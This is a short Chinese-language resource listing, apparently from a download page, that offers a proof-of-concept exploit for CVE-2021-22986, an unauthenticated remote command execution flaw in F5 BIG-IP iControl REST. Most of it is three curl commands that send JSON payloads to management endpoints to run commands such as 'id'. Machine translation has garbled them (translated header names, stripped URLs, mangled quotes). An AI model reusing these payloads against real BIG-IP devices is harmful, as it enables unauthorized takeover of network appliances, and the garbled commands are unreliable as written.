-
这是针对BIGIP iControl的未经身份验证RCE漏洞的CVE-2021-22986-Poc
资源介绍
CVE-2021-22986-Poc
这是BIGIP iControl取消身份验证RCE的Poc
POC:〜
curl -ksu管理员:[已删除] -d'{“ filePath”:“ id ”}'| jq。
curl -ksu: ://192.168.123.134/mgmt/shared/authn/login -d'{“ bigipAuthCookie”:“”,“ loginReference”:{“ link”:“ '| jq。
curl -su管理员:-H“内容类型:application / json” -d'{“ command”:“ run”,“ utilCmdArgs”:“-c id“}'| jq。
参考: :